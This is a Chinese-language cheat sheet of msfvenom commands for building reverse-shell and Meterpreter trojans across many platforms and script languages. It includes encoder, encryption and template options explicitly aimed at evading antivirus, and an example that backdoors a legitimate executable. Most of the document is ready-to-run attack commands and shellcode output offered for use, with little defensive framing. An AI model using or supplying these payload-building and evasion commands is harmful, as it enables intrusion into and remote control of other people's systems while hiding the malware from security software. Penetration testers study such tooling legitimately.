貼上使用筆記 不多介紹了 很簡單的東西
msfvenom各平台生成木馬大全:
windows:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻擊機IP LPORT=攻擊機端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f exe -opayload.exe
mac:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻擊機IP
LPORT=攻擊機端口 -f macho -o payload.macho
android:
//需要簽名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻擊機IP LPORT=攻擊機端口 -f apk -o payload.apk
powershell:
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=
攻擊機IP LPORT=攻擊機端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
linux:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻擊機IP LPORT=攻擊機端口 -f elf -o payload.elf
php:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=
<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >>
shell.php
aspx:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=
攻擊機IP LPORT=攻擊機端口 -f aspx -o payload.aspx
jsp:
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻擊機IP LPORT=攻擊機端口 -f raw -o payload.jsp
war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻擊機IP LPORT=攻擊機端口 -f raw -
o payload.war
nodejs:
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻擊機IP LPORT=攻擊機端口 -f raw -o
payload.js
python:
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻擊機IP LPORT=攻擊機端口 -
f raw -o payload.py
perl:
msfvenom -p cmd/unix/reverse_perl LHOST=攻擊機IP LPORT=攻擊機端口 -f raw -o
payload.pl
ruby:
msfvenom -p ruby/shell_reverse_tcp LHOST=攻擊機IP LPORT=攻擊機端口 -f raw -o
payload.rb
lua:
msfvenom -p cmd/unix/reverse_lua LHOST=攻擊機IP LPORT=攻擊機端口 -f raw -o
payload.lua
windows shellcode:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻擊機IP LPORT=攻擊機端口 -f c
linux shellcode:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
擊機IP LPORT=攻擊機端口 -f c
mac shellcode:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻擊機IP
LPORT=攻擊機端口 -f c
msfvenom常見參數混淆免殺
MSFvenom選項和使用
msfvenom -v or –var-name
Usage: -v, –var-name >name>
指定用於某些輸出格式的自定義變量名稱。 用-v指定名稱將將輸出的變量從默認的"buf"更改為您提供的任何字詞。
默認輸出示例:[buf]
root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b ‘\x00‘ -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
buf = ""
buf += "\xda\xdc\xd9\x74\x24\xf4\x5b\xba\xc5\x5e\xc1\x6a\x29"
...snip...
使用-var-name輸出示例:[nobuf]
root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b ‘\x00‘ -f python -v notBuf
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
notBuf = ""
notBuf += "\xda\xd1\xd9\x74\x24\xf4\xbf\xf0\x1f\xb8\x27\x5a"
...snip...
msfvenom –help-format
使用此選項列舉msfvenom所有可用的有效載荷格式。
root@kali:~# msfvenom --help-formats
Executable formats
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small,
hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection,
psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl,
powershell, ps1, py, python, raw, rb, ruby, sh,
vbapplication, vbscript
msfvenom -n, –nopsled
有時您需要在有效載荷開始時添加一些NOP[空]。 這將在您的有效載荷的開頭放置一個[-n 長度]的大小。
使用-n之前:
root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e generic/none -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 299 (iteration=0)
generic/none chosen with final size 299
Payload size: 299 bytes
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" **First line of payload
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
...snip...
使用-n之后:
root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e generic/none -f python -n 26
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 299 (iteration=0)
generic/none chosen with final size 299
Successfully added NOP sled from x86/single_byte
Payload size: 325 bytes
buf = ""
buf += "\x98\xfd\x40\xf9\x43\x49\x40\x4a\x98\x49\xfd\x37\x43" **NOPs
buf += "\x42\xf5\x92\x42\x42\x98\xf8\xd6\x93\xf5\x92\x3f\x98"
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" **First line of payload
...snip...
msfvenom –smallest
如果使用--smallest選項,msfvevom將嘗試創建最小的shellcode選擇編碼器和有效載荷。
root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b ‘\x00‘ -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
...snip...
root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b ‘\x00‘ -f python --smallest
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 312 (iteration=0)
x86/shikata_ga_nai chosen with final size 312
Payload size: 312 bytes
...snip...
msfvenom -c, –add-code
指定一個win32 shellcode文件,再創建兩個載荷合並到一個shellcode中
Payload #1:
root@kali:~# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="MSFU Example" -f raw > messageBox
No encoder or badchars specified, outputting raw payload
Payload size: 267 bytes
Adding payload #2:
root@kali:~# msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="We are evil" -f raw > messageBox2
Adding shellcode from messageBox to the payload
No encoder or badchars specified, outputting raw payload
Payload size: 850 bytes
Adding payload #3:
root@kali:~# msfvenom -c messageBox2 -a x86 --platform Windows -p windows/shell/bind_tcp -f exe -o cookies.exe
Adding shellcode from messageBox2 to the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1469 bytes
Saved as: cookies.exe
運行"cookies.exe"文件,將執行兩個消息框的payloads,bindshell將使用默認配置綁定(端口4444)。
msfvenom -x, –template & -k, –keep
-x/-template選項:
用於指定在創建可執行有效負載時用作模板的現有可執行文件。
-k/-keep選項:
可以保留模板的正常行為,並將注入的有效負載作為單獨的線程運行。
root@kali:~# msfvenom -a x86 --platform windows -x sol.exe -k -p windows/messagebox lhost=192.168.101.133 -b "\x00" -f exe -o sol_bdoor.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 299 (iteration=0)
x86/shikata_ga_nai chosen with final size 299
Payload size: 299 bytes
Saved as: sol_bdoor.exe
kali更新后新增支持免殺加密
-l 載荷列表
-f 生成的文件格式
-e 編碼方式
-i 編碼次數
-b 在生成的程序中避免出現的值
-x 允許我們指定一個自定義的可執行文件作為模板,也就是將木馬捆綁到這個可執行文件上。
--encrypt 加密方式
--encrypt-key 密鑰
加密方式
並且此次添加了四種加密方式,分別為AES256-CBC、RC4、XOR和Base64。
使用方法:
msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f c
也可以使用msf的evasion show evasion 過defender
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b ‘\x00‘ -i 3 -f python
msf5自帶混淆 效果很弱
更新了后 自帶windows denfender的混淆
效果一般 早不免殺了
總比沒有好 自己配合其他手段免殺
show evasion
不多介紹了 傻瓜式使用
最后提一句 還是自己逆向免殺shellcode才是王道
